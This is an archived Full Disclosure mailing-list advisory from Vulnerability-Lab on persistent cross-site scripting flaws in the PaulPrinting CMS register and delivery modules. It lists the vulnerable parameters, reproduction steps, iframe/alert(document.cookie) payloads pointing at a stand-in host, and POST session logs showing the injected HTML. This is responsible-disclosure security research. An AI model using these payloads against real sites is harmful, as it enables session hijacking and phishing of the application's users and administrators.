[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities
From: "info () vulnerability-lab ! com" <info () vulnerability-lab ! com>
Date: 2023-07-19 7:47:38
Message-ID: b48d1104-7d62-5267-9db2-ec35e26c0180 () vulnerability-lab ! com
[Download RAW message or body]
This is an OpenPGP/MIME signed message (RFC 4880 and 3156)
--------------K9LdZd7et4yxWvrT0Dqmzz00
From: "info@vulnerability-lab.com" <info@vulnerability-lab.com>
Reply-To: info@vulnerability-lab.com
To: fulldisclosure@seclists.org
Message-ID: <b48d1104-7d62-5267-9db2-ec35e26c0180@vulnerability-lab.com>
Subject: PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities
Content-Type: multipart/mixed; boundary="------------Y60CJSe61qYk40f8mu6mfnII"
[Attachment #2 (text/plain)]
Document Title:
===============
PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2285
Release Date:
=============
2023-07-19
Vulnerability Laboratory ID (VL-ID):
====================================
2285
Common Vulnerability Scoring System:
====================================
5.8
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and \
with a visually appealing interface.
(Copy of the Homepage:https://codecanyon.net/user/codepaul )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple persistent cross site \
vulnerabilities in the PaulPrinting (v2018) cms web-application.
Affected Product(s):
====================
CodePaul
Product: PaulPrinting (2018) - CMS (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2022-08-25: Researcher Notification & Coordination (Security Researcher)
2022-08-26: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-19: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (User Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
Multiple persistent input validation vulnerabilities has been discovered in the official \
PaulPrinting (v2018) cms web-application. The vulnerability allows remote attackers to inject \
own malicious script codes with persistent attack vector to compromise browser to \
web-application requests from the application-side.
The first vulnerability is located in the register module. Remote attackers are able to \
register user account with malicious script code. After the registration to attacker provokes \
an execution of the malformed scripts on review of the settings or by user reviews of admins in \
the backend (listing).
The second vulnerability is located in the delivery module. Remote attackers with low \
privileged user accounts are able to inject own malicious script code to contact details. Thus \
allows to perform an execute on each interaction with users or by reviews of admins in the \
backend (listing).
Successful exploitation of the vulnerability results in session hijacking, persistent phishing \
attacks, persistent external redirects to malicious source and persistent manipulation of \
affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] /printing/register
[+] /account/delivery
Vulnerable Input(s):
[+] First name
[+] Last name
[+] Address
[+] City
[+] State
Vulnerable Parameter(s):
[+] firstname
[+] lastname
[+] address
[+] city
[+] state
Affected Module(s):
[+] Frontend Settings (./printing/account/setting)
[+] Frontend Delivery Address (./printing/account/delivery)
[+] Backend User Preview Listing
[+] Backend Delivery Address Contact Review
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by remote attackers with \
low privileged user account and low user interaction. For security demonstration or to \
reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Open your browser and start a http session tamper
2. Register in the application by login click to register
3. Inject to the marked vulnerable input fields your test payload
4. Save the entry by submit via post method
5. Login to the account and preview the settings
Note: Administrators in the backend have the same wrong validated context that executes on \
preview of users 6. The script code executes on preview of the profile - settings
7. Successful reproduce of the first vulnerability!
8. Followup by opening the Delivery address module
9. Add a contact and add in the same vulnerable marked input fields your test payload
Note: T he script code executes on each review of the address in the backend or user frontend
10. Successful reproduce of the second vulnerability!
Exploitation: Payload
"<iframe src=evil.source onload(alert(document.cookie)>
"<iframe src=evil.source onload(alert(document.domain)>
--- PoC Session Logs (POST) ---
https://paulprinting.localhost:8000/printing/account/setting
Host: paulprinting.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 357
Origin:https://paulprinting.localhost:8000
Connection: keep-alive
Referer:https://paulprinting.localhost:8000/printing/account/setting
Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd;
POST:
title=Mr.&firstname=a"<iframe src=evil.source onload(alert(document.cookie)>>
&lastname=b"<iframe src=evil.source onload(alert(document.cookie)>>
&address=c"<iframe src=evil.source onload(alert(document.cookie)>>
&city=d"<iframe src=evil.source onload(alert(document.cookie)>>
&state=e"<iframe src=evil.source onload(alert(document.cookie)>>
&zipcode=2342&country=BS&phone=23523515235235&save=Save
-
POST: HTTP/3.0 302 Found
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.1.33
location:https://paulprinting.localhost:8000/printing/account/setting?save=1
-
https://paulprinting.localhost:8000/printing/account/setting?save=1
Host: paulprinting.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer:https://paulprinting.localhost:8000/printing/account/setting
Connection: keep-alive
Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd;
-
POST: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.1.33
Vulnerable Source: Your Account - Settings
<div class="form-group row">
<label class="col-sm-4 col-form-label">First name</label>
<div class="col-sm-8">
<input type="text" name="firsttname" class="form-control" value="a"<iframe src=evil.source \
onload(alert(document.cookie)>"> </div></div>
<label class="col-sm-4 col-form-label">Last name</label>
<div class="col-sm-8">
<input type="text" name="lastname" class="form-control" value="b"<iframe src=evil.source \
onload(alert(document.cookie)>"> </div></div>
<div class="form-group row">
<label class="col-sm-4 col-form-label">Address</label>
<div class="col-sm-8">
<input type="text" name="address" class="form-control" value="c"<iframe src=evil.source \
onload(alert(document.cookie)>"> </div></div>
<div class="form-group row">
<label class="col-sm-4 col-form-label">City</label>
<div class="col-sm-8">
<input type="text" name="city" class="form-control" value="d"<iframe src=evil.source \
onload(alert(document.cookie)>"> </div></div>
<div class="form-group row">
<label class="col-sm-4 col-form-label">State</label>
<div class="col-sm-8">
<input type="text" name="state" class="form-control" value="e"<iframe src=evil.source \
onload(alert(document.cookie)>"> </div></div>
Vulnerable Source: Deliery Contact (Address)
<table class="table">
<thead>
<tr>
<th>Contact</th>
<th>Address</th>
<th>City</th>
<th>State</th>
<th>Country</th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td>a"<iframe src=evil.source onload(alert(document.cookie)></td>
<td>b"<iframe src=evil.source onload(alert(document.cookie)></td>
<td>c"<iframe src=evil.source onload(alert(document.cookie)></td>
<td>d"<iframe src=evil.source onload(alert(document.cookie)></td>
<td></td>
<td class="text-right">
<a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10">Edit</a>|
<a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10&delete=1" \
onclick="return confirm('Delete')">Delete</a> </td></tr></tbody>
</table>
Security Risk:
==============
The security risk of the cross site scripting web vulnerabilities with persistent attack vector \
are estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] \
-https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any licenses, \
policies, deface websites, hack into databases or trade with stolen data.
Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit \
our material contact (admin@ or research@) to get a ask permission.
Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
["OpenPGP_0x1554D09B2933E2FE.asc" (application/pgp-keys)]
["OpenPGP_signature.asc" (OpenPGP_signature.asc)]
-----BEGIN PGP SIGNATURE-----
wsF5BAABCAAjFiEE0BctHpBdnIQSMWpxFVTQmykz4v4FAmS3lRoFAwAAAAAACgkQFVTQmykz4v42
iw/9FzKsWkwex/XFf2MECrDHsqfktF7ter0+gpNRoxr4YYdu+t4QpjnfdqZQnKvCttYqy8gfUypu
EFVxCYfhJj0qU0VcGp9FDDsmiDgwIkn/uvc1NYwd5jXRVDf2x9yEXX0KV+5GVJRglDM46OkYU+sD
lCKUaAPKrUyUSFghi9EOgEUDoX97RHNv4cRVtCTKtv412Bdk+kgXdfUmSKCS5yuaWjz0wU4owNM0
04egt/78lu7LMfpMx40+/BVh5xZ7xNdyG6LxahtGznXS1SawCOlVKuPb+al1Xrlg7dP6hcmmKPkl
IzSd1UcbRMuMlBCB78Of/hVekohn3dKP9iGL/0AqHLQ+gD000Jc7wYd3xP5jJpSR9jWn9V06fJgT
NhRthKvxXyVJt/ftTCL9vg1Puelf6v8/ks7p4F4vmqvZTt0cw0Arx7i4CbhejJnkZgr2k68qFDtO
YBucKepC+e5R8MKjBCoKJwlr9bDJMiT1aCFWU9F9r5PtwYtuyoe2QIdnlmycrnhnKXECugkVxvPB
BDefxcqYkNb/z53G8t0j8NJwdy3+ojYrkNkOrJ+Kgs3RDPz6yYjds0tIHlR27lds0yUUBZzsN5DA
SVrAAWbfn/9wzcp+R8d8MDnk6m+4DXR8dp+XEcH49TPfEym1TSMb4E96b6RVQzH4HJ7+A7VA06n6
Sdk=
=KF+V
-----END PGP SIGNATURE-----
--------------K9LdZd7et4yxWvrT0Dqmzz00--
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
--===============6986691597460430673==--
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic